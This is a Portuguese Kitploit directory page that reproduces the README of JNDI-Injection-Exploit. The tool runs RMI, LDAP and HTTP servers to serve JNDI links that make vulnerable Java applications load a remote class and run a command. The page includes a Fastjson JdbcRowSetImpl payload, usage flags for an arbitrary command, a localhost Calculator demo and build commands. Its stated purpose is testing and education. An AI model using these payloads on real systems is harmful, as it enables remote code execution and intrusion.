Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
JNDI-Injection-Exploit — JNDI注入测试工具(Uma ferramenta que gera links JNDI pode iniciar vários servidores para explorar vulnerabilidades de injeção JNDI, como Jackson, Fastjson, etc) | Kitploit
Ferramentas/GitHubGitHub/welk1n/jndi-injection-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubwelk1n/jndi-injection-exploit

JNDI-Injection-Exploit

JNDI注入测试工具(Uma ferramenta que gera links JNDI pode iniciar vários servidores para explorar vulnerabilidades de injeção JNDI, como Jackson, Fastjson, etc)

Ver Repositório
2.8k730há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

JNDI-Injection-Exploit

Materiais sobre Injeção JNDI

中文文档

相关文章

Descrição

JNDI-Injection-Exploit é uma ferramenta para gerar links JNDI funcionais e fornecer serviços em segundo plano iniciando servidor RMI, servidor LDAP e servidor HTTP. O servidor RMI e o servidor LDAP são baseados no marshalsec e modificados adicionalmente para se conectar ao servidor HTTP.

Usar esta ferramenta permite obter links JNDI, você pode inserir esses links no seu POC para testar a vulnerabilidade.

Por exemplo, este é um Fastjson vul-poc:

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

Podemos substituir "rmi://127.0.0.1:1099/Object" pelo link gerado pelo JNDI-Injection-Exploit para testar a vulnerabilidade.

Aviso

Todas as informações e código são fornecidos exclusivamente para fins educacionais e/ou teste dos seus próprios sistemas para essas vulnerabilidades.

Uso

Execute como

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [comando] [-A] [endereço]

onde:

  • -C - comando executado no arquivo de classe remoto. (opcional, comando padrão é "open /Applications/Calculator.app")
  • -A - o endereço do seu servidor, pode ser um endereço IP ou um domínio. (opcional, endereço padrão é o primeiro endereço de interface de rede)

Pontos de atenção:

  • certifique-se de que as portas do seu servidor (1099, 1389, 8180) estão disponíveis. ou você pode alterar a porta padrão na classe run.ServerStart linhas 26~28.

  • seu comando é passado para Runtime.getRuntime().exec() como parâmetros, então você precisa garantir que seu comando seja funcional no método exec().

    Comandos no bash como "bash -c ...." precisam adicionar aspas duplas.

Exemplos

Demonstração local:

  1. Inicie a ferramenta assim:

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
    

    Captura de tela:

    image-20191018154346759

  2. Suponha que injetamos os links JNDI como rmi://ADDRESS/jfxllc gerados no passo 1 em uma aplicação vulnerável que pode ser atacada por injeção JNDI.

    Neste exemplo, fica assim:

    root@kitploit:~
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }
    

    então quando executamos este código, o comando será executado, e o log será impresso no shell:

    image-20191018154515787

Instalação

Podemos selecionar um dos dois métodos para obter o jar.

  1. Baixe o jar mais recente do Realease.

  2. Clone o código fonte para local e compile (Requer Java 1.8+ e Maven 3.x+).

    root@kitploit:~
    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

Para fazer

  • (Concluído) Combinar este projeto com JNDI-Injection-Bypass para gerar links funcionais quando trustURLCodebase for false em versões superiores do JDK por padrão.
  • … ...
Baixar ferramenta